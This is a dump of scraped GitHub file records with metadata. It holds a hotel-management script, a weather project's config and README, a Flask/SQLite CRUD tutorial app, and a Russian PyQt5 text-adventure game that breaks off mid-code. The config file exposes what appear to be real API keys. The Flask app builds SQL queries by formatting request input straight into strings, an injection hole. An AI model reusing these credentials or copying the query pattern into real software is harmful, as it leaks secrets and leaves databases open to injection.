hotel = Hotels[hotel_ids[index]]\n addRoomToHotel(hotel)\n\n elif opt_no == '3':\n displayAll()\n\n elif opt_no == '4':\n budget = input(\"Enter budget in dollars: $\")\n while budget.isnumeric() == False:\n print(\"Budget should be in numeric!\")\n budget = input(\"Enter budget in dollars: $\")\n displayAll(int(budget))\n\n elif opt_no == '5':\n exit()\n\n else:\n print(\"Invalid Input!! Choose options from 1 to 5\")\n\n\nmain()\n"
},
{
"alpha_fraction": 0.7581300735473633,
"alphanum_fraction": 0.7703251838684082,
"avg_line_length": 43.727272033691406,
"blob_id": "273de291877f14516bf97c8339e552ca00040feb",
"content_id": "1327c4febcd74b790dde174449b5550605b80d3b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 492,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 11,
"path": "/README.md",
"repo_name": "MariyaBosy/UnitedLayer",
"src_encoding": "UTF-8",
"text": "# UnitedLayer Assignment\n\n## Hotel Management\n An interactive command prompt based shell in python to execute following functionalities:\n 1.Add Hotel with rooms,items in each room with price choosen by user\n 2.Add rooms to existing hotels with items and values\n 3.Print out each room along with the individual items and values.\n 4.Accept a budget from the user(in $) and list only those rooms which will cost less than or equal to his budget.\n \n ## Requirements\n 1. Python version 3.x\n"
}
] | 2 |
Riicha/Weatherpy
|
https://github.com/Riicha/Weatherpy
|
206dbba76dbdb38eb3e374fa617752e3bce72fdb
|
950ee6c712b60373c0d457103b6f5a361d952dae
|
480566848b5b7392880404b9aed99bafd828d314
|
refs/heads/master
| 2020-03-20T20:11:03.829383 | 2018-06-19T22:08:57 | 2018-06-19T22:08:57 | 137,674,083 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.45679011940956116,
"alphanum_fraction": 0.7407407164573669,
"avg_line_length": 26,
"blob_id": "6fd6bf0c5d2b8e8f53a3b0321e3ff492068e8da3",
"content_id": "4d818c70a65a87b441a01ac401fdbaadf59274cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 81,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 3,
"path": "/config.py",
"repo_name": "Riicha/Weatherpy",
"src_encoding": "UTF-8",
"text": "# Enter your API key\ngkey = \"AIzaSyAG6hNdWAkx2SUWhsaVCRJRq_pqEkS_UXA\"\nowm_key = \"22ef252e688a343e0816e54c41f0e510\"\n"
},
{
"alpha_fraction": 0.7878289222717285,
"alphanum_fraction": 0.8018091917037964,
"avg_line_length": 70.52941131591797,
"blob_id": "1d278da5646a732ed30e1802ba2c1de8be9445a6",
"content_id": "b40d8c72614f0cb249b648e90d5c85e8820d5657",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1216,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 17,
"path": "/readme.md",
"repo_name": "Riicha/Weatherpy",
"src_encoding": "UTF-8",
"text": "# Generate an API hey from https://openweathermap.org/api\n# Analysis:-\nThe plot on Latitude vs Temperature shows that the temperature is highest at the equator and lowest at the poles.\nThe humidity at the equator is in the range from 50%-100%. However, the trends does not change based on the latitude.\nThere seems to be no co-relation of cloudliness with respect to the latitude.\nThe windspeed for most cities fall under 20(mph) and there seems to be no trend on the windspeed with respect to the latitude\n# Steps:\nImport the Dependencies\nThe Latitudes range considered from Equator : -90 to 90 & Longitudes range considered from Primeredian: -180 to 180\nRamdomly generate co-ordinates by setting Latitude and Longitude.\nCreate a dataframe from the random sample of Latitude and Longitude.\nCreate new columns City and Country for storing the details corresponding to the co-ordinates.\nDrop the Latitude and Longitude as the values of the nearest city and not the excat co-ordinates of the city.\nGet data for each city in unique_cities_data.(Perform API Calls)\nCreate an \"extracts\" object to get the various parameter required to form the weather data table.\nCreate a Pandas DataFrame with the results.\nPlot Graphs.\n"
}
] | 2 |
v3nividiv1ci/NAIVE_CRUD
|
https://github.com/v3nividiv1ci/NAIVE_CRUD
|
6e92acd56a96d5c2ce4ee4f72177d860b8c894a7
|
28a3be74bff75f3c3e885a607c9452c2330cec7f
|
ab0ad3f8a10b8861da2310cfb13d8a4c31369834
|
refs/heads/main
| 2023-04-03T17:48:01.730558 | 2021-04-11T06:07:33 | 2021-04-11T06:07:33 | 347,976,990 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.49127641320228577,
"alphanum_fraction": 0.4986225962638855,
"avg_line_length": 32.24528121948242,
"blob_id": "0e060de847c80761e5b5d3454170e38d152a77a0",
"content_id": "f5035123b53965026134d3dbb07053d97d232998",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5785,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 159,
"path": "/flaskr/__init__.py",
"repo_name": "v3nividiv1ci/NAIVE_CRUD",
"src_encoding": "UTF-8",
"text": "import os\r\n\r\nfrom flask import Flask\r\nfrom flask import request\r\n\r\n\r\ndef create_app(test_config=None):\r\n # create and configure the app\r\n app = Flask(__name__, instance_relative_config=True)\r\n app.config.from_mapping(\r\n SECRET_KEY='dev',\r\n DATABASE=os.path.join(app.instance_path, 'flaskr.sqlite'),\r\n )\r\n\r\n from . import db\r\n db.init_app(app)\r\n\r\n def query_db(query, args=(), one=False):\r\n cur = db.get_db().execute(query, args)\r\n rv = cur.fetchall()\r\n cur.close()\r\n return (rv[0] if rv else None) if one else rv\r\n\r\n if test_config is None:\r\n # load the instance config, if it exists, when not testing\r\n app.config.from_pyfile('config.py', silent=True)\r\n else:\r\n # load the test config if passed in\r\n app.config.from_mapping(test_config)\r\n\r\n # ensure the instance folder exists\r\n try:\r\n os.makedirs(app.instance_path)\r\n except OSError:\r\n pass\r\n\r\n # a simple page that says hello\r\n @app.route('/hello')\r\n def hello():\r\n return 'Hello, World!'\r\n\r\n @app.route('/')\r\n def hello_world():\r\n return 'Hello, World!'\r\n\r\n @app.route('/name', methods=['GET', 'POST'])\r\n def get_name():\r\n if request.method == 'POST':\r\n return 'hibana from POST'\r\n else:\r\n return 'hibana from GET'\r\n\r\n @app.route('/age')\r\n def get_age():\r\n return '17'\r\n\r\n ## 用户资料endpoint\r\n # R: Read 读取创建的user profile\\GET\r\n # C: Create 创建一个user profile\\POST\r\n # U: Update 更新创建的user profile\\PUT\r\n # D: Delete 删除创建的user profile\\DELETE\r\n\r\n @app.route('/userProfile', methods=['GET', 'POST', 'PUT', 'DELETE'])\r\n def userProfile():\r\n if request.method == 'GET':\r\n # name = request.args.get('name', '')\r\n uid = request.args.get('uid', 1)\r\n # print(name, flush=True)\r\n print(uid, flush=True)\r\n # 3. 写sql\r\n query = \"SELECT *FROM userProfile WHERE id={}\".format(uid)\r\n print(query, flush=True)\r\n # 通过用户的id来查询用户的资料\r\n result = query_db(query, one=True)\r\n # 1. 获取数据库连接\r\n # connection = db.get_db()\r\n # 2. 获取一个数据库的游标 cursor\r\n # 4. 执行sql\r\n # cursor = connection.execute(query)\r\n # result = cursor.fetchall()\r\n print(result, flush=True)\r\n if result is None:\r\n return dict(message=\"404 not found\")\r\n else:\r\n name = result['name']\r\n age = result['age']\r\n print(result['name'])\r\n print(result['age'])\r\n return dict(name=name, age=age)\r\n # cursor.close()\r\n # 5. 处理从数据库里读取的数据\r\n # 6. 将数据返回给调用者\r\n return '1'\r\n\r\n # 从数据库里读取\r\n # if (name == 'hibana'):\r\n # return dict(name='hibana from GET', age=17)\r\n # else:\r\n # return dict(name='屑学弟 from GET', age=114514)\r\n elif request.method == 'POST':\r\n # name\r\n # fans\r\n print(request.json, flush=True)\r\n # print(request.form, flush=True)\r\n # print(request.data, flush=True)\r\n # name = request.form.get('name')\r\n # age = request.form.get('age')\r\n name = request.json.get('name')\r\n age = request.json.get('age')\r\n # 获取post body中的name和fans\r\n # 输入新的数据到数据库\r\n # 1.获取新的数据库连接\r\n connection = db.get_db()\r\n # 写sql\r\n query = \"INSERT INTO userProfile (name, age) values('{}', {})\".format(name, age)\r\n print(query)\r\n # 2.执行\r\n try:\r\n cursor = connection.execute(query)\r\n # 3.DML Data Manipulate Language\r\n # 当你对数据库里面的数据有改动的时候,需要commit,否则改动不会生效\r\n # execute的时候就会去数据库里面执行这条sql,如果有错误,会报错\r\n connection.commit()\r\n\r\n print(cursor.lastrowid)\r\n return dict(success=True)\r\n except:\r\n return dict(success=False, message=\"username exist\", errorCode=1)\r\n #\r\n # if (name == 'hibana'):\r\n # return dict(name='hibana from POST', age=17)\r\n # else:\r\n # return dict(name='懒狗 from POST', age=1919810)\r\n # return '1'\r\n elif request.method == 'PUT':\r\n print(request.json, flush=True)\r\n uid = request.args.get('uid', 1)\r\n name = request.json.get('name')\r\n age = request.json.get('age')\r\n connection = db.get_db()\r\n query = \"UPDATE userProfile SET name = '{}', age = {} WHERE id = {}\".format(name, age, uid)\r\n print(query)\r\n try:\r\n cursor = connection.execute(query)\r\n connection.commit()\r\n print(cursor.lastrowid)\r\n return dict(success=True)\r\n except:\r\n return dict(success=False, message=\"username already existed\", errorCode=1)\r\n return 1\r\n elif request.method == 'DELETE':\r\n uid = request.args.get('uid', 1)\r\n connection = db.get_db()\r\n query = \"DELETE from userProfile WHERE id = {}\".format(uid)\r\n connection.execute(query)\r\n connection.commit()\r\n return dict(success=True)\r\n\r\n return app\r\n"
},
{
"alpha_fraction": 0.734000027179718,
"alphanum_fraction": 0.7919999957084656,
"avg_line_length": 98.80000305175781,
"blob_id": "e2dd8b0cb5f78ca5c529f19ae423e3b6a62cec5c",
"content_id": "b3ce18caec26877e6cf09bfa376019265ac14017",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 738,
"license_type": "no_license",
"max_line_length": 409,
"num_lines": 5,
"path": "/README.md",
"repo_name": "v3nividiv1ci/NAIVE_CRUD",
"src_encoding": "UTF-8",
"text": "3.18 main.py删除了qwq抱歉让你们看到肥宅了呜呜已经爬了\n#\n3.17 push错项目了aaa我这是push了个什么蠢萌的东西qwq等我回去改一下qwqqwq\n# \n跟随<a href=\"https://space.bilibili.com/43276908\" target=\"_blank\">落拓</a>的<a href=\"https://www.bilibili.com/video/BV1NA411t7gu\" target=\"_blank\">教程一</a>、<a href=\"https://www.bilibili.com/video/BV1Fz4y1d7kc\" target=\"_blank\">教程二</a>、<a href=\"https://www.bilibili.com/video/BV1nV41117fS\" target=\"_blank\">教程三</a>进行的简单后端服务的搭建,学习基本SQL语句及CRUD的使用。使用flask框架和python自带的sqlite数据库,使用tableplus进行数据库可视化管理,使用postman进行模拟html请求的发送。\n\n"
}
] | 2 |
Sergey2004-cpu/Saratov-Karpov
|
https://github.com/Sergey2004-cpu/Saratov-Karpov
|
3962d864fe18b19900734b30033f4c3fbabdbb0d
|
371d05fb967d8da97abd51df9c4f4972d8963ae2
|
78f6120032a8b543e1442db70793edfc1eb79e06
|
refs/heads/master
| 2020-12-04T14:37:42.743411 | 2020-01-09T17:05:04 | 2020-01-09T17:05:04 | 231,803,070 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5536574125289917,
"alphanum_fraction": 0.5705900192260742,
"avg_line_length": 32.640506744384766,
"blob_id": "e10380c37c7b9211d7cd6c891e1b6178eedfd0e6",
"content_id": "886636ec5c63a238f103f24c5d3693af9358fc50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 28278,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 790,
"path": "/mainfile.py",
"repo_name": "Sergey2004-cpu/Saratov-Karpov",
"src_encoding": "UTF-8",
"text": "import sys\n\nfrom PyQt5.QtCore import QRect, QPoint\nfrom PyQt5.QtWidgets import QApplication, QWidget, QMainWindow\nfrom ui_file import Ui_MainWindow\nfrom ui_file2 import Ui_MainWindow2\nfrom ui_file3 import Ui_MainWindow3\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QPixmap\nimport sqlite3\nimport random\nfrom PyQt5 import QtGui\n\n\nclass MainWindow(QMainWindow, Ui_MainWindow, QWidget):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.pushButton.clicked.connect(self.openfunction)\n\n def openfunction(self):\n self.second_form = SecondWindow(self)\n self.second_form.show()\n\n\n\n\n\nclass SecondWindow(QMainWindow, Ui_MainWindow2):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.pushButton.clicked.connect(self.closefunction)\n self.pushButton_2.clicked.connect(self.openfunction1)\n self.pushButton_4.clicked.connect(self.openfunction2)\n self.pushButton_3.clicked.connect(self.openfunction3)\n\n def closefunction(self):\n self.close()\n\n def openfunction1(self):\n self.second_form = ThirdWindow(self)\n self.second_form.show()\n self.close()\n\n\n def openfunction2(self):\n self.third_form = ToweroneWindow(self)\n self.third_form.show()\n self.close()\n\n def openfunction3(self):\n self.fourth_form = TronWindow(self)\n self.fourth_form.show()\n self.close()\n\n\nclass ThirdWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton.clicked.connect(self.closefunction)\n self.pushButton_2.clicked.connect(self.openfunction1)\n self.pushButton_3.clicked.connect(self.openfunction2)\n\n\n pixmap = QPixmap('Podzemele_11-1180x664.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n\n\n def closefunction(self):\n self.close()\n\n def openfunction1(self):\n self.second_form = ForthWindow(self)\n self.second_form.show()\n self.close()\n\n def openfunction2(self):\n self.second_form = FifthWindow(self)\n self.second_form.show()\n self.close()\n\n\n\n\n\nclass ForthWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton.clicked.connect(self.closefunction)\n self.pushButton_2.clicked.connect(self.openfunction1)\n self.pushButton_3.clicked.connect(self.openfunction2)\n pixmap = QPixmap('cropped-metal-and-stone-spiral-staircase-1024x614.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''С каждым шагом вы спускаетесь всё ниже и ниже. И вдруг начинаете слышать голоса. \n Это голоса узников замка, которые заключены в подземельях. Вы можете спасти их. Но Стоит ли это делать? ''')\n self.pushButton_2.setText('Спасти')\n self.pushButton_3.setText('Подняться наверх')\n self.flag = True\n\n\n def closefunction(self):\n self.close()\n\n def openfunction1(self):\n self.second_form = SixWindow(self)\n self.second_form.show()\n self.close()\n\n def openfunction2(self):\n self.second_form = SevenWindow(self)\n self.second_form.show()\n self.close()\n\n\nclass FifthWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.pushButton.clicked.connect(self.closefunction)\n self.pushButton_2.clicked.connect(self.openfunction1)\n self.pushButton_3.clicked.connect(self.openfunction2)\n pixmap = QPixmap('qwert.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Перед вами Развилка. Куда пойдёте?''')\n self.pushButton_2.setText('Налево')\n self.pushButton_3.setText('Направо')\n self.flag = True\n\n def closefunction(self):\n self.close()\n\n def openfunction1(self):\n self.second_form = ForthWindow(self)\n self.second_form.show()\n self.close()\n\n def openfunction2(self):\n self.second_form = NewWindow(self)\n self.second_form.show()\n self.close()\n\n\n\nclass SixWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.pushButton.clicked.connect(self.closefunction)\n self.pushButton_2.clicked.connect(self.openfunction1)\n self.pushButton_3.clicked.connect(self.openfunction2)\n pixmap = QPixmap('565184067a7e2_DSC05695.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Они вам очень благодарны. Узники рассказали вам, что хозяин замка \nочень жесток и просто так вам не выбраться. Бежать с ними?''')\n self.pushButton_2.setText('Да')\n self.pushButton_3.setText('Нет')\n\n def closefunction(self):\n self.close()\n\n def openfunction1(self):\n self.second_form = EWindow(self)\n self.second_form.show()\n self.close()\n\n def openfunction2(self):\n self.second_form = NWindow(self)\n self.second_form.show()\n self.close()\n\n\nclass SevenWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.pushButton.clicked.connect(self.closefunction)\n self.pushButton_3.clicked.connect(self.openfunction1)\n self.pushButton_2.clicked.connect(self.openfunction2)\n pixmap = QPixmap('3261190647_05e748b932_o.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Они в ярости. Вам приходится убежать и вы поднимаетесь наверх, перед вами двери тронного зала.''')\n self.pushButton_2.setText('Остаться')\n self.pushButton_3.setText('Бежать из замка')\n\n def closefunction(self):\n self.close()\n\n def openfunction1(self):\n self.second_form = TWindow(self)\n self.second_form.show()\n self.close()\n\n def openfunction2(self):\n self.second_form = TronWindow(self)\n self.second_form.show()\n self.close()\n\n\nclass EWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.pushButton.clicked.connect(self.closefunction)\n self.pushButton_2.clicked.connect(self.closefunction)\n self.pushButton_3.clicked.connect(self.closefunction)\n pixmap = QPixmap('499176_pole_razrushennyj-zamok_tuchi_pejzazh_4000x2500_www.Gde-Fon.com.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Вы сбежали вместе с заключенными из замка. они спасли вам жизнь.\nВы решили никогда больше не возвращиться в тот замок. И правильно сделали.''')\n self.pushButton_2.setText('Завершить')\n self.pushButton_3.setText('Завершить')\n\n def closefunction(self):\n self.close()\n\nclass NWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.pushButton.clicked.connect(self.closefunction)\n self.pushButton_2.clicked.connect(self.closefunction)\n self.pushButton_3.clicked.connect(self.closefunction)\n pixmap = QPixmap('1441290094_dungeon-cave-hydra.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Очень жаль. Ведь позже в подземелье вам вас укусила змея и вы мучительно погибли.''')\n self.pushButton_2.setText('Завершить')\n self.pushButton_3.setText('Завершить')\n\n def closefunction(self):\n self.close()\n\nclass ToweroneWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton_2.clicked.connect(self.openfunction1)\n self.pushButton_3.clicked.connect(self.openfunction2)\n pixmap = QPixmap('preview.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''В башне Дракон охраняет принцессу. Вы можете сразиться с драконом или спусться в тронный зал''')\n self.pushButton_2.setText('Сразиться')\n self.pushButton_3.setText('Бежать')\n\n def openfunction1(self):\n self.second_form = PrinWindow(self)\n self.second_form.show()\n self.close()\n\n def openfunction2(self):\n self.second_form = StWindow(self)\n self.second_form.show()\n self.close()\n\n\nclass TWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton_2.clicked.connect(self.closefunction)\n self.pushButton_3.clicked.connect(self.closefunction)\n pixmap = QPixmap('unnamed.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Вы сбежали из замка. На этом квест завершён.''')\n self.pushButton_2.setText('Завершить')\n self.pushButton_3.setText('Завершить')\n\n def closefunction(self):\n self.close()\n\nclass PrinWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton_2.clicked.connect(self.openfunction1)\n self.pushButton_3.clicked.connect(self.openfunction2)\n pixmap = QPixmap('the-alluring-charm-of-15th-century-antique-elm-chests-31-BI1.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Вы победили дракона. Перед вами открылась тайная комната. В ней стоит очень странный сундук.''')\n self.pushButton_2.setText('Открыть')\n self.pushButton_3.setText('Уйти')\n\n def closefunction(self):\n self.close()\n\n def openfunction1(self):\n self.second_form = TrWindow(self)\n self.second_form.show()\n self.close()\n\n def openfunction2(self):\n self.second_form = TronWindow(self)\n self.second_form.show()\n self.close()\n\nclass StWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton_2.clicked.connect(self.closefunction)\n self.pushButton_3.clicked.connect(self.closefunction)\n pixmap = QPixmap('i.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Вы бежали вниз по скользкой лестнице и упали.\nочень жаль но вам не удалось выбраться живым из замка.''')\n self.pushButton_2.setText('Завершить')\n self.pushButton_3.setText('Завершить')\n\n def closefunction(self):\n self.close()\n\nclass TrWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton_2.clicked.connect(self.closefunction)\n self.pushButton_3.clicked.connect(self.closefunction)\n pixmap = QPixmap('rare-horror-movies.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Вы открыли Сундук, я он оказался полон сокровищами.\nНо всё не так просто, ведь сундук, кроме дракона охранял скелет, он убивает вас. Лучше бы вы бежали.''')\n self.pushButton_2.setText('Завершить')\n self.pushButton_3.setText('Завершить')\n\n def closefunction(self):\n self.close()\n\n\nclass TronWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton_2.clicked.connect(self.openfunction1)\n self.pushButton_3.clicked.connect(self.openfunction2)\n pixmap = QPixmap('8c7d7a5090d9c5ee07f6ba86e061ac4e.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''После всех испытаний вы попали в тронный зал. Там вас уже ждёт король со своей стражей.\nОн наслышен о ваших приключениях и просит вас об услуге.''')\n self.pushButton_2.setText('Помочь королю')\n self.pushButton_3.setText('Отказать')\n\n def closefunction(self):\n self.close()\n\n def openfunction1(self):\n self.second_form = HelpWindow(self)\n self.second_form.show()\n self.close()\n\n def openfunction2(self):\n self.second_form = PrisonWindow(self)\n self.second_form.show()\n self.close()\n\n\nclass HelpWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton_2.clicked.connect(self.openfunction1)\n self.pushButton_3.clicked.connect(self.openfunction2)\n pixmap = QPixmap('22.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n 